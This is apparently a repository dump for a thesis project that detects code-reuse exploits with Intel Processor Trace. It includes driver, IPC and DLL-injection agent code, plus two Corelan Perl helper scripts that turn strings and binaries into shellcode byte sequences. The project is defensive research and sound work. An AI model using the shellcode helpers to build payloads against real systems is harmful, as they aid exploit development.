{A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Debug|Win32.Build.0 = Debug|Win32 54 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Debug|Win32.Deploy.0 = Debug|Win32 55 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Debug|x64.ActiveCfg = Debug|x64 56 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Debug|x64.Build.0 = Debug|x64 57 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Debug|x64.Deploy.0 = Debug|x64 58 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Release|Any CPU.ActiveCfg = Release|Win32 59 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Release|Win32.ActiveCfg = Release|Win32 60 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Release|Win32.Build.0 = Release|Win32 61 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Release|Win32.Deploy.0 = Release|Win32 62 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Release|x64.ActiveCfg = Release|x64 63 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Release|x64.Build.0 = Release|x64 64 | {A9D835FD-18CC-4CA8-B29B-48077C43C48B}.Release|x64.Deploy.0 = Release|x64 65 | EndGlobalSection 66 | GlobalSection(SolutionProperties) = preSolution 67 | HideSolutionNode = FALSE 68 | EndGlobalSection 69 | EndGlobal 70 | -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/asm/Amd64XSave.asm: -------------------------------------------------------------------------------- 1 | ; Windows Intel PT Driver 2 | ; Filename: Amd64XSave.asm 3 | ; Description: Implement the support for the Supervisor XSAVE routines 4 | ; Last revision: 01/25/2017 5 | TITLE Windows Pt Driver AMD64 Assembler File 6 | 7 | 8 | ;Declare an external function 9 | ;EXTERN ExternalCFunc: PROC 10 | 11 | .data 12 | 13 | .code 14 | ;void _xsaves(void *mem, unsigned __int64 save_mask); 15 | _xsaves PROC 16 | mov r8, rcx 17 | mov ecx, edx 18 | shr rdx, 020h 19 | xsaves qword ptr [r8] 20 | ret 21 | _xsaves ENDP 22 | 23 | 24 | END -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/resource.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/resource.h -------------------------------------------------------------------------------- /Projects/WindowsPtDriver/stdafx.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Projects/WindowsPtDriver/stdafx.h -------------------------------------------------------------------------------- /Projects/common/common.h: -------------------------------------------------------------------------------- 1 | #ifndef _COMMON_H_ 2 | #define _COMMON_H_ 3 | 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | namespace PtExploitDetectorCommon 20 | { 21 | enum ExecutorsMode 22 | { 23 | GET_REMOTE_FUNCTION_ADDRESS = 0x05, 24 | NA, 25 | }; 26 | 27 | inline const wchar_t* ExecutorModeToString(ExecutorsMode value) 28 | { 29 | switch (value) 30 | { 31 | case GET_REMOTE_FUNCTION_ADDRESS: return L"Get Remote Function Address"; 32 | default: return L"[Unknown TestExecutor]"; 33 | } 34 | } 35 | 36 | inline bool GetFullPathToFile(const std::wstring &fileName, std::wstring &fullPathFile) 37 | { 38 | bool ret = true; 39 | wchar_t ptargetFile[MAX_PATH] = { 0 }; 40 | 41 | if (GetFullPathName(fileName.c_str(), MAX_PATH, ptargetFile, NULL) == 0) 42 | { 43 | ret = false; 44 | } 45 | else 46 | { 47 | fullPathFile.assign(ptargetFile); 48 | } 49 | 50 | return ret; 51 | } 52 | 53 | static const bool DEFAULT_VERBOSITY_STATUS = false; 54 | static const ExecutorsMode DEFAULT_EXECUTOR_MODE = ExecutorsMode::NA; 55 | static const std::wstring DEFAULT_DLL_TO_INJECT = L"PtExploitDetectorAgent.dll"; 56 | static const std::wstring PRE_CHANNEL_TOKEN = L"PTEXPLOITDETECTORAGENTIPC_"; 57 | 58 | static inline void Xtrace(LPCTSTR lpszFormat, ...) 59 | { 60 | va_list args; 61 | va_start(args, lpszFormat); 62 | int nBuf; 63 | TCHAR szBuffer[2048] = { 0 }; //fix this 64 | nBuf = _vsnwprintf_s(szBuffer, 2047, lpszFormat, args); 65 | ::OutputDebugString(szBuffer); 66 | va_end(args); 67 | } 68 | } 69 | 70 | 71 | #endif -------------------------------------------------------------------------------- /Projects/common/ipc.h: -------------------------------------------------------------------------------- 1 | #ifndef _BREEZE_SIMPLE_IPC_H_ 2 | #define _BREEZE_SIMPLE_IPC_H_ 3 | 4 | 5 | #define MAX_NAME_LEN 64 6 | 7 | // 4M 8 | #define MEMMAP_SIZE 4 * 1024 *1024 9 | 10 | #ifdef __cplusplus 11 | extern "C" { 12 | #endif 13 | 14 | #pragma pack(push, 1) 15 | typedef struct _IpcServer{ 16 | HANDLE mapFile; 17 | HANDLE reqEvent; 18 | HANDLE repEvent; 19 | HANDLE readyEvent; 20 | HANDLE doneEvent; 21 | BYTE * buf; 22 | DWORD timeout; 23 | }IpcServer, *PIpcServer; 24 | 25 | #pragma warning( push ) 26 | #pragma warning(disable:4200) 27 | typedef struct _CommPacket{ 28 | ULONG size; 29 | ULONG cmd; 30 | BYTE data[0]; 31 | }CommPacket, *PCommPacket; 32 | #pragma warning( pop ) 33 | 34 | #pragma pack(pop) 35 | 36 | #ifdef __cplusplus 37 | IpcServer* ServerCreate(LPCTSTR serverName = NULL); 38 | #else 39 | IpcServer* ServerCreate(LPCTSTR serverName); 40 | #endif 41 | BOOL ServerWaitClientDone(IpcServer* server); 42 | BOOL ServerWaitForRequst(IpcServer* server); 43 | VOID ServerReplied(IpcServer* server); 44 | VOID ServerClose(IpcServer* server); 45 | VOID ServerReady(IpcServer* server); 46 | 47 | #ifdef __cplusplus 48 | CommPacket* ClientRequest(ULONG cmd, const BYTE* data, SIZE_T size, LPCTSTR serverName = NULL, DWORD timeout = 1000); 49 | #else 50 | CommPacket* ClientRequest(ULONG cmd, const BYTE* data, SIZE_T size, LPCTSTR serverName, DWORD timeout); 51 | #endif 52 | VOID FreePacket(CommPacket *packet); 53 | 54 | 55 | #ifdef __cplusplus 56 | } 57 | #endif 58 | #endif -------------------------------------------------------------------------------- /Projects/common/ipcpp.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // or paste `ipc.h` and `ipc.c`'s code here. 5 | #include "ipc.h" 6 | extern "C" { 7 | #include "ipc.c" 8 | }; 9 | 10 | #include "ipcpp.h" 11 | 12 | #pragma comment(lib, "Ws2_32.lib") 13 | 14 | namespace dipc 15 | { 16 | mutex::mutex() {}; 17 | mutex::~mutex() {}; 18 | void mutex::lock() { 19 | while(this->interlock_ == 1 20 | || InterlockedCompareExchange(&this->interlock_, 1, 0) == 1) { 21 | Sleep(1); 22 | } 23 | } 24 | void mutex::unlock() { 25 | this->interlock_ = 0; 26 | } 27 | 28 | locker::locker(mutex& m): m_(m) { 29 | m_.lock(); 30 | } 31 | locker::~locker() { 32 | m_.unlock(); 33 | } 34 | 35 | server::server(const std::tstring& name, int timeout) : 36 | data_(NULL), stop_(false), routers_() { 37 | do { 38 | data_ = ServerCreate(name.c_str()); 39 | if (data_) { 40 | data_->timeout = timeout; 41 | } 42 | } while (false); 43 | } 44 | 45 | server::~server(){ } 46 | 47 | void server::run() { 48 | if (!data_) { 49 | return; 50 | } 51 | stop_ = false; 52 | while(!stop_) { 53 | ServerReady(data_); 54 | if (ServerWaitForRequst(data_)) { 55 | CommPacket* packet = (CommPacket*)data_->buf; 56 | std::vector::size_type i = 0; 57 | for (; i < routers_.size(); i++) 58 | { 59 | if (routers_[i].cmd == packet->cmd) { 60 | packet->size = routers_[i].handler((unsigned char*)packet->data) + sizeof(CommPacket); 61 | break; 62 | } 63 | } 64 | if (i == routers_.size()) { 65 | packet->cmd = -1; 66 | packet->size = sizeof(CommPacket); 67 | } 68 | ServerReplied(data_); 69 | ServerWaitClientDone(data_); 70 | } 71 | } 72 | } 73 | 74 | void server::stop() { stop_ = true; } 75 | void server::route(int cmd, pf_handler handler) { 76 | locker l(this->mr_); 77 | std::vector::iterator it = routers_.begin(); 78 | for (; it != routers_.end(); it++) 79 | { 80 | if (it->cmd == cmd) { 81 | it->handler = handler; 82 | break; 83 | } 84 | } 85 | if (it == routers_.end()) { 86 | router r = {cmd, handler}; 87 | routers_.push_back(r); 88 | } 89 | } 90 | 91 | client::client(const std::tstring& server_name, int timeout) : 92 | server_name(server_name), timeout(timeout) { } 93 | 94 | client::~client() { } 95 | 96 | byte_array client::request(int cmd, unsigned char* data, int data_size) { 97 | byte_array ret; 98 | CommPacket* packet = ClientRequest(cmd, data, data_size, server_name.c_str(), timeout); 99 | if (packet) { 100 | if (packet->cmd == cmd) { 101 | ret.insert(ret.begin(), (unsigned char*)packet->data, (unsigned char*)packet + packet->size); 102 | } 103 | FreePacket(packet); 104 | } 105 | return ret; 106 | } 107 | } -------------------------------------------------------------------------------- /Projects/common/ipcpp.h: -------------------------------------------------------------------------------- 1 | #ifndef _DIPC_H_ 2 | #define _DIPC_H_ 3 | 4 | #include 5 | 6 | #include "ipc.h" 7 | 8 | namespace dipc 9 | { 10 | class mutex 11 | { 12 | private: 13 | volatile LONG interlock_; 14 | public: 15 | mutex(); 16 | ~mutex(); 17 | private: 18 | void lock(); 19 | void unlock(); 20 | friend class locker; 21 | }; 22 | 23 | class locker 24 | { 25 | mutex& m_; 26 | public: 27 | locker(mutex& m); 28 | ~locker(); 29 | }; 30 | 31 | typedef int (*pf_handler)(unsigned char* data); 32 | 33 | #ifdef _UNICODE 34 | #define tstring wstring 35 | #else 36 | #define tstring string 37 | #endif 38 | 39 | class server { 40 | struct router { 41 | int cmd; 42 | pf_handler handler; 43 | }; 44 | typedef IpcServer server_data; 45 | 46 | public: 47 | server(const std::tstring& name = std::tstring(), int timeout = 1000); 48 | ~server(); 49 | void run(); 50 | void stop(); 51 | void route(int cmd, pf_handler handler); 52 | 53 | private: 54 | bool stop_; 55 | mutex mr_; 56 | std::vector routers_; 57 | struct server_data* data_; 58 | }; 59 | 60 | typedef std::vector byte_array; 61 | 62 | class client { 63 | public: 64 | client(const std::tstring& server_name = std::tstring(), int timeout = 1000); 65 | ~client(); 66 | 67 | byte_array request(int cmd, unsigned char* data = NULL, int data_size = 0); 68 | private: 69 | std::tstring server_name; 70 | int timeout; 71 | }; 72 | } 73 | 74 | #endif -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Computer Engineering - Thesis Project 2 | 3 | **Title**: “Code-Reuse Exploits detection using the Intel Processor Trace technology” 4 | 5 | **Description**: This project pretends, making use of the IntelPT technology, develop a mechanism to detect different kinds of Code-Reuse exploits (ie: ret2libc, ROP, JOP, etc.) at runtime, based on the Control Flow Integrity mitigation (aka. CFI). 6 | 7 | **Credits**: This project make use of the following projects: 8 | * [WindowsIntelPT Driver](https://github.com/intelpt/WindowsIntelPT) 9 | * [Libipt - Intel(R) Processor Trace decoder library](https://github.com/01org/processor-trace) 10 | * [Keystone assembler framework](https://github.com/keystone-engine/keystone) 11 | * [RapidJSON](https://github.com/Tencent/rapidjson) 12 | * [DIPC](https://github.com/breezechen/dipc) 13 | * [Plog](https://github.com/SergiusTheBest/plog) 14 | -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/INSTDRV.EXE: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_IntelPt/INSTDRV.EXE -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/INSTDRV_init_V01.bat: -------------------------------------------------------------------------------- 1 | INSTDRV.EXE V01\WindowsPtDriver.sys -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/INSTDRV_init_V02.bat: -------------------------------------------------------------------------------- 1 | INSTDRV.EXE V02\WindowsPtDriver.sys -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/V01/Readme.md: -------------------------------------------------------------------------------- 1 | Init version. This version is the version contained in the original fork. -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/V01/WindowsPtDriver.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_IntelPt/V01/WindowsPtDriver.cer -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/V01/WindowsPtDriver.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_IntelPt/V01/WindowsPtDriver.exp -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/V01/WindowsPtDriver.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_IntelPt/V01/WindowsPtDriver.lib -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/V01/WindowsPtDriver.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_IntelPt/V01/WindowsPtDriver.sys -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/V02/Readme.md: -------------------------------------------------------------------------------- 1 | This version implements a fix to suport the Spectre&Meltdown windows patch. 2 | The path includes a new mechanism to work with the directory table. Now there are two 3 | base addresses, one is the DirectoryTableBase and the other the UserDirectoryTableBase. 4 | 5 | nt!_KPROCESS 6 | +0x000 Header : _DISPATCHER_HEADER 7 | +0x018 ProfileListHead : _LIST_ENTRY 8 | +0x028 DirectoryTableBase : Uint8B 9 | +0x030 ThreadListHead : _LIST_ENTRY 10 | +0x040 ProcessLock : Uint4B 11 | +0x044 ProcessTimerDelay : Uint4B 12 | +0x048 DeepFreezeStartTime : Uint8B 13 | +0x050 Affinity : _KAFFINITY_EX 14 | +0x0f8 ReadyListHead : _LIST_ENTRY 15 | +0x108 SwapListEntry : _SINGLE_LIST_ENTRY 16 | +0x110 ActiveProcessors : _KAFFINITY_EX 17 | +0x1b8 AutoAlignment : Pos 0, 1 Bit 18 | +0x1b8 DisableBoost : Pos 1, 1 Bit 19 | +0x1b8 DisableQuantum : Pos 2, 1 Bit 20 | +0x1b8 DeepFreeze : Pos 3, 1 Bit 21 | +0x1b8 TimerVirtualization : Pos 4, 1 Bit 22 | +0x1b8 CheckStackExtents : Pos 5, 1 Bit 23 | +0x1b8 PpmPolicy : Pos 6, 3 Bits 24 | +0x1b8 ActiveGroupsMask : Pos 9, 20 Bits 25 | +0x1b8 ReservedFlags : Pos 29, 3 Bits 26 | +0x1b8 ProcessFlags : Int4B 27 | +0x1bc BasePriority : Char 28 | +0x1bd QuantumReset : Char 29 | +0x1be Visited : UChar 30 | +0x1bf Flags : _KEXECUTE_OPTIONS 31 | +0x1c0 ThreadSeed : [20] Uint4B 32 | +0x210 IdealNode : [20] Uint2B 33 | +0x238 IdealGlobalNode : Uint2B 34 | +0x23a Spare1 : Uint2B 35 | +0x23c StackCount : _KSTACK_COUNT 36 | +0x240 ProcessListEntry : _LIST_ENTRY 37 | +0x250 CycleTime : Uint8B 38 | +0x258 ContextSwitches : Uint8B 39 | +0x260 SchedulingGroup : Ptr64 _KSCHEDULING_GROUP 40 | +0x268 FreezeCount : Uint4B 41 | +0x26c KernelTime : Uint4B 42 | +0x270 UserTime : Uint4B 43 | +0x274 ReadyTime : Uint4B 44 | +0x278 UserDirectoryTableBase : Uint8B 45 | +0x280 AddressPolicy : UChar 46 | +0x281 Spare2 : [71] UChar 47 | +0x2c8 InstrumentationCallback : Ptr64 Void 48 | +0x2d0 SecureState : -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/V02/WindowsPtDriver.cer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_IntelPt/V02/WindowsPtDriver.cer -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/V02/WindowsPtDriver.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_IntelPt/V02/WindowsPtDriver.exp -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/V02/WindowsPtDriver.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_IntelPt/V02/WindowsPtDriver.lib -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/V02/WindowsPtDriver.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_IntelPt/V02/WindowsPtDriver.sys -------------------------------------------------------------------------------- /Resources/Compiled_IntelPt/readme.md: -------------------------------------------------------------------------------- 1 |

Compiled Windows Intel PT Driver

2 | 3 |

This folder contains the compiled version of the Windows Intel PT Driver and Control Application

4 |

Version: 0.6

5 |

News: 6 |

    7 |
  • Re-designed the entire driver code. Now it is much more modular and scalable
    • 8 |
  • Added and tested the support for Kernel-mode tracing
    • 9 |
  • Added the support for Kernel tracing from the user-mode application (requires Administratives privilege)
    • 10 |
  • Added the support for Microsoft HyperV (Root Partition only)
    • 11 |
  • Written some example code for doing Kernel-tracing of the loading/unloading code of a target driver
    • 12 |

13 |

Unfortunately the driver code is still too young to be compiled as signed. 14 | You need to enable the Test Signing mode in your Windows OS to be able to use the driver. 15 | By the way our tests highlighted that the code was really very stable. 16 | Write us a mail (info@andrea-allievi.com) if you find some bugs or for any other queries. 17 | If I find the time I will be happy to answer. 18 |

19 |

Last Revision: 17th June 2017 - Recon Conference
20 |

21 | -------------------------------------------------------------------------------- /Resources/Compiled_keystone/include/arm.h: -------------------------------------------------------------------------------- 1 | /* Keystone Assembler Engine */ 2 | /* By Nguyen Anh Quynh, 2016 */ 3 | 4 | #ifndef KEYSTONE_ARM_H 5 | #define KEYSTONE_ARM_H 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | #include "keystone.h" 12 | 13 | typedef enum ks_err_asm_arm { 14 | KS_ERR_ASM_ARM_INVALIDOPERAND = KS_ERR_ASM_ARCH, 15 | KS_ERR_ASM_ARM_MISSINGFEATURE, 16 | KS_ERR_ASM_ARM_MNEMONICFAIL, 17 | } ks_err_asm_arm; 18 | 19 | #ifdef __cplusplus 20 | } 21 | #endif 22 | 23 | #endif 24 | -------------------------------------------------------------------------------- /Resources/Compiled_keystone/include/arm64.h: -------------------------------------------------------------------------------- 1 | /* Keystone Assembler Engine */ 2 | /* By Nguyen Anh Quynh, 2016 */ 3 | 4 | #ifndef KEYSTONE_ARM64_H 5 | #define KEYSTONE_ARM64_H 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | #include "keystone.h" 12 | 13 | typedef enum ks_err_asm_arm64 { 14 | KS_ERR_ASM_ARM64_INVALIDOPERAND = KS_ERR_ASM_ARCH, 15 | KS_ERR_ASM_ARM64_MISSINGFEATURE, 16 | KS_ERR_ASM_ARM64_MNEMONICFAIL, 17 | } ks_err_asm_arm64; 18 | 19 | #ifdef __cplusplus 20 | } 21 | #endif 22 | 23 | #endif 24 | -------------------------------------------------------------------------------- /Resources/Compiled_keystone/include/hexagon.h: -------------------------------------------------------------------------------- 1 | /* Keystone Assembler Engine */ 2 | /* By Nguyen Anh Quynh, 2016 */ 3 | 4 | #ifndef KEYSTONE_HEXAGON_H 5 | #define KEYSTONE_HEXAGON_H 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | #include "keystone.h" 12 | 13 | typedef enum ks_err_asm_hexagon { 14 | KS_ERR_ASM_HEXAGON_INVALIDOPERAND = KS_ERR_ASM_ARCH, 15 | KS_ERR_ASM_HEXAGON_MISSINGFEATURE, 16 | KS_ERR_ASM_HEXAGON_MNEMONICFAIL, 17 | } ks_err_asm_hexagon; 18 | 19 | 20 | #ifdef __cplusplus 21 | } 22 | #endif 23 | 24 | #endif 25 | -------------------------------------------------------------------------------- /Resources/Compiled_keystone/include/mips.h: -------------------------------------------------------------------------------- 1 | /* Keystone Assembler Engine */ 2 | /* By Nguyen Anh Quynh, 2016 */ 3 | 4 | #ifndef KEYSTONE_MIPS_H 5 | #define KEYSTONE_MIPS_H 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | #include "keystone.h" 12 | 13 | typedef enum ks_err_asm_mips { 14 | KS_ERR_ASM_MIPS_INVALIDOPERAND = KS_ERR_ASM_ARCH, 15 | KS_ERR_ASM_MIPS_MISSINGFEATURE, 16 | KS_ERR_ASM_MIPS_MNEMONICFAIL, 17 | } ks_err_asm_mips; 18 | 19 | #ifdef __cplusplus 20 | } 21 | #endif 22 | 23 | #endif 24 | -------------------------------------------------------------------------------- /Resources/Compiled_keystone/include/ppc.h: -------------------------------------------------------------------------------- 1 | /* Keystone Assembler Engine */ 2 | /* By Nguyen Anh Quynh, 2016 */ 3 | 4 | #ifndef KEYSTONE_PPC_H 5 | #define KEYSTONE_PPC_H 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | #include "keystone.h" 12 | 13 | typedef enum ks_err_asm_ppc { 14 | KS_ERR_ASM_PPC_INVALIDOPERAND = KS_ERR_ASM_ARCH, 15 | KS_ERR_ASM_PPC_MISSINGFEATURE, 16 | KS_ERR_ASM_PPC_MNEMONICFAIL, 17 | } ks_err_asm_ppc; 18 | 19 | 20 | #ifdef __cplusplus 21 | } 22 | #endif 23 | 24 | #endif 25 | -------------------------------------------------------------------------------- /Resources/Compiled_keystone/include/sparc.h: -------------------------------------------------------------------------------- 1 | /* Keystone Assembler Engine */ 2 | /* By Nguyen Anh Quynh, 2016 */ 3 | 4 | #ifndef KEYSTONE_SPARC_H 5 | #define KEYSTONE_SPARC_H 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | #include "keystone.h" 12 | 13 | typedef enum ks_err_asm_sparc { 14 | KS_ERR_ASM_SPARC_INVALIDOPERAND = KS_ERR_ASM_ARCH, 15 | KS_ERR_ASM_SPARC_MISSINGFEATURE, 16 | KS_ERR_ASM_SPARC_MNEMONICFAIL, 17 | } ks_err_asm_sparc; 18 | 19 | 20 | #ifdef __cplusplus 21 | } 22 | #endif 23 | 24 | #endif 25 | -------------------------------------------------------------------------------- /Resources/Compiled_keystone/include/systemz.h: -------------------------------------------------------------------------------- 1 | /* Keystone Assembler Engine */ 2 | /* By Nguyen Anh Quynh, 2016 */ 3 | 4 | #ifndef KEYSTONE_SYSTEMZ_H 5 | #define KEYSTONE_SYSTEMZ_H 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | #include "keystone.h" 12 | 13 | typedef enum ks_err_asm_systemz { 14 | KS_ERR_ASM_SYSTEMZ_INVALIDOPERAND = KS_ERR_ASM_ARCH, 15 | KS_ERR_ASM_SYSTEMZ_MISSINGFEATURE, 16 | KS_ERR_ASM_SYSTEMZ_MNEMONICFAIL, 17 | } ks_err_asm_systemz; 18 | 19 | 20 | #ifdef __cplusplus 21 | } 22 | #endif 23 | 24 | #endif 25 | -------------------------------------------------------------------------------- /Resources/Compiled_keystone/include/x86.h: -------------------------------------------------------------------------------- 1 | /* Keystone Assembler Engine */ 2 | /* By Nguyen Anh Quynh, 2016 */ 3 | 4 | #ifndef KEYSTONE_X86_H 5 | #define KEYSTONE_X86_H 6 | 7 | #ifdef __cplusplus 8 | extern "C" { 9 | #endif 10 | 11 | #include "keystone.h" 12 | 13 | typedef enum ks_err_asm_x86 { 14 | KS_ERR_ASM_X86_INVALIDOPERAND = KS_ERR_ASM_ARCH, 15 | KS_ERR_ASM_X86_MISSINGFEATURE, 16 | KS_ERR_ASM_X86_MNEMONICFAIL, 17 | } ks_err_asm_x86; 18 | 19 | #ifdef __cplusplus 20 | } 21 | #endif 22 | 23 | #endif 24 | -------------------------------------------------------------------------------- /Resources/Compiled_keystone/x64/keystone.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_keystone/x64/keystone.dll -------------------------------------------------------------------------------- /Resources/Compiled_keystone/x64/keystone.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_keystone/x64/keystone.lib -------------------------------------------------------------------------------- /Resources/Compiled_keystone/x86/keystone.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_keystone/x86/keystone.dll -------------------------------------------------------------------------------- /Resources/Compiled_keystone/x86/keystone.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_keystone/x86/keystone.lib -------------------------------------------------------------------------------- /Resources/Compiled_libipt/libipt.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DProvinciani/pt-detector/90740d272ba53ea096110f80b703416fa19c3e23/Resources/Compiled_libipt/libipt.dll -------------------------------------------------------------------------------- /Resources/Corelan_scripts/pvePushString.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Perl script written by Peter Van Eeckhoutte 3 | # http://www.corelan.be:8800 4 | # This script takes a string as argument 5 | # and will produce the opcodes 6 | # to push this string onto the stack 7 | # 8 | if ($#ARGV ne 0) { 9 | print " usage: $0 ".chr(34)."String to put on stack".chr(34)."\n"; 10 | exit(0); 11 | } 12 | #convert string to bytes 13 | my $strToPush=$ARGV[0]; 14 | my $strThisChar=""; 15 | my $strThisHex=""; 16 | my $cnt=0; 17 | my $bytecnt=0; 18 | my $strHex=""; 19 | my $strOpcodes=""; 20 | my $strPush=""; 21 | print "String length : " . length($strToPush)."\n"; 22 | print "Opcodes to push this string onto the stack :\n\n"; 23 | while ($cnt < length($strToPush)) 24 | { 25 | $strThisChar=substr($strToPush,$cnt,1); 26 | $strThisHex="\\x".ascii_to_hex($strThisChar); 27 | if ($bytecnt < 3) 28 | { 29 | $strHex=$strHex.$strThisHex; 30 | $bytecnt=$bytecnt+1; 31 | } 32 | else 33 | { 34 | $strPush = $strHex.$strThisHex; 35 | $strPush =~ tr/\\x//d; 36 | $strHex=chr(34)."\\x68".$strHex.$strThisHex.chr(34). 37 | " //PUSH 0x".substr($strPush,6,2).substr($strPush,4,2). 38 | substr($strPush,2,2).substr($strPush,0,2); 39 | 40 | $strOpcodes=$strHex."\n".$strOpcodes; 41 | $strHex=""; 42 | $bytecnt=0; 43 | } 44 | $cnt=$cnt+1; 45 | } 46 | #last line 47 | if (length($strHex) > 0) 48 | { 49 | while(length($strHex) < 12) 50 | { 51 | $strHex=$strHex."\\x20"; 52 | } 53 | $strPush = $strHex; 54 | $strPush =~ tr/\\x//d; 55 | $strHex=chr(34)."\\x68".$strHex."\\x00".chr(34)." //PUSH 0x00". 56 | substr($strPush,4,2).substr($strPush,2,2).substr($strPush,0,2); 57 | $strOpcodes=$strHex."\n".$strOpcodes; 58 | } 59 | else 60 | { 61 | #add line with spaces + null byte (string terminator) 62 | $strOpcodes=chr(34)."\\x68\\x20\\x20\\x20\\x00".chr(34)." //PUSH 0x00202020"."\n".$strOpcodes; 63 | } 64 | print $strOpcodes; 65 | 66 | 67 | sub ascii_to_hex ($) 68 | { 69 | (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg; 70 | return $str; 71 | } -------------------------------------------------------------------------------- /Resources/Corelan_scripts/pveReadbin.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Perl script written by Peter Van Eeckhoutte 3 | # http://www.corelan.be:8800 4 | # This script takes a filename as argument 5 | # will read the file 6 | # and output the bytes in \x format 7 | # 8 | if ($#ARGV ne 0) { 9 | print " usage: $0 ".chr(34)."filename".chr(34)."\n"; 10 | exit(0); 11 | } 12 | #open file in binary mode 13 | print "Reading ".$ARGV[0]."\n"; 14 | open(FILE,$ARGV[0]); 15 | binmode FILE; 16 | my ($data, $n, $offset, $strContent); 17 | $strContent=""; 18 | my $cnt=0; 19 | while (($n = read FILE, $data, 1, $offset) != 0) { 20 | $offset += $n; 21 | } 22 | close(FILE); 23 | 24 | print "Read ".$offset." bytes\n\n"; 25 | my $cnt=0; 26 | my $nullbyte=0; 27 | print chr(34); 28 | for ($i=0; $i < (length($data)); $i++) 29 | { 30 | my $c = substr($data, $i, 1); 31 | $str1 = sprintf("%01x", ((ord($c) & 0xf0) >> 4) & 0x0f); 32 | $str2 = sprintf("%01x", ord($c) & 0x0f); 33 | if ($cnt < 8) 34 | { 35 | print "\\x".$str1.$str2; 36 | $cnt=$cnt+1; 37 | } 38 | else 39 | { 40 | $cnt=1; 41 | print chr(34)."\n".chr(34)."\\x".$str1.$str2; 42 | } 43 | if (($str1 eq "0") && ($str2 eq "0")) 44 | { 45 | $nullbyte=$nullbyte+1; 46 | } 47 | } 48 | print chr(34).";\n"; 49 | print "\nNumber of null bytes : " . $nullbyte."\n"; 50 | -------------------------------------------------------------------------------- /Resources/Corelan_scripts/pveWritebin.pl: -------------------------------------------------------------------------------- 